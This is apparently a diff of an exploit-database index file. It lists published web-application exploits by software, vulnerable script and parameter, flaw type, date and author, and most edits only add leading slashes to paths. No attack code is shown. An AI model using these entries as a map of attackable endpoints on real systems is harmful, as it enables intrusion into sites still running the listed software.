Kunz Mejri",php,webapps,0 +36683,platforms/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",php,webapps,0 -36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - 'admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 +36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - '/path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36691,platforms/php/webapps/36691.txt,"WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 -36696,platforms/php/webapps/36696.txt,"Nova CMS - 'administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36697,platforms/php/webapps/36697.txt,"Nova CMS - 'optimizer/index.php?fileType' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36698,platforms/php/webapps/36698.txt,"Nova CMS - 'includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36699,platforms/php/webapps/36699.txt,"Nova CMS - 'includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36696,platforms/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36697,platforms/php/webapps/36697.txt,"Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36698,platforms/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36699,platforms/php/webapps/36699.txt,"Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_db_setup.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_display.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -35686,18 +35687,18 @@ id,file,description,date,author,platform,type,port 36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_maintenance.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_payload.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'help/base_setup_help.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_action.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_cache.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_db.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_include.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_output_html.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_output_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_criteria.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'setup/base_conf_contents.php' Multiple Remote File Inclusions",2012-02-11,indoushka,php,webapps,0 -36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'setup/setup2.php?ado_inc_PHP' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/help/base_setup_help.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_action.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_cache.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_db.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_include.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/base_conf_contents.php' Multiple Remote File Inclusions",2012-02-11,indoushka,php,webapps,0 +36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/setup2.php?ado_inc_PHP' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_alert.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -35718,14 +35719,14 @@ id,file,description,date,author,platform,type,port 36751,platforms/php/webapps/36751.txt,"WordPress Plugin Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' HTML Injection",2012-02-13,sonyy,php,webapps,0 -36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - 'pfile/kommentar.php?filecat' Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 -36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - 'pfile/file.php?id' SQL Injection",2012-02-13,indoushka,php,webapps,0 +36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - '/pfile/kommentar.php?filecat' Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 +36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - '/pfile/file.php?id' SQL Injection",2012-02-13,indoushka,php,webapps,0 36768,platforms/php/webapps/36768.txt,"ProWiki - 'id' Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - 'prospects.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - 'prospect.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 @@ -35735,7 +35736,7 @@ id,file,description,date,author,platform,type,port 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36777,platforms/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - 'admin/index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - '/admin/index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 @@ -35779,7 +35780,7 @@ id,file,description,date,author,platform,type,port 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 36873,platforms/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps,0 -36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 - 'includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",php,webapps,0 +36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",php,webapps,0 36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 @@ -35792,7 +35793,7 @@ id,file,description,date,author,platform,type,port 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php?page' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 -36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - '/backend/modules/error/actions/index.php parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS - 'q' URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps,0 @@ -35817,7 +35818,7 @@ id,file,description,date,author,platform,type,port 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' SQL Injection",2012-03-08,Mazt0r,php,webapps,0 -36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - 'setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 +36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - '/setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 @@ -35887,24 +35888,24 @@ id,file,description,date,author,platform,type,port 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' SQL Injection",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 -37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 +37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - '/fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - fw/createAnomaly.do subTab Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0 -37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - 'admin/login.php?Username' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - 'admin/htaccess.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - 'admin/xsell.php?search' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - 'admin/stats_products_purchased.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37042,platforms/php/webapps/37042.txt,"osCMax 2.5 - 'admin/stats_monthly_sales.php?status' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37043,platforms/php/webapps/37043.txt,"osCMax 2.5 - 'admin/stats_customers.php?sorted' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - 'admin/information_manager.php?information_id' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - 'admin/geo_zones.php?zID' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - 'admin/new_attributes_include.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37047,platforms/php/webapps/37047.html,"osCMax 2.5 - 'admin/login.php?Username' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - 'admin/stats_monthly_sales.php?status' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - '/admin/login.php?Username' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - '/admin/htaccess.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - '/admin/xsell.php?search' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - '/admin/stats_products_purchased.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37042,platforms/php/webapps/37042.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37043,platforms/php/webapps/37043.txt,"osCMax 2.5 - '/admin/stats_customers.php?sorted' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - '/admin/information_manager.php?information_id' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - '/admin/geo_zones.php?zID' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - '/admin/new_attributes_include.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37047,platforms/php/webapps/37047.html,"osCMax 2.5 - '/admin/login.php?Username' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,php,webapps,0 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 @@ -35926,7 +35927,7 @@ id,file,description,date,author,platform,type,port 37078,platforms/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 -37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 +37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - '/index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 37083,platforms/php/webapps/37083.txt,"Joomla! Plugin Beatz 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 @@ -35942,7 +35943,7 @@ id,file,description,date,author,platform,type,port 37253,platforms/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 -37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 +37100,platforms/php/webapps/37100.txt,"Waylu CMS - '/products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Component com_videogallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 @@ -35982,13 +35983,13 @@ id,file,description,date,author,platform,type,port 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 -37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - 'plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - 'plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - 'templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - '/templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php' URI Parameter Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - 'Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 -37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - 'Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 +37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 +37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 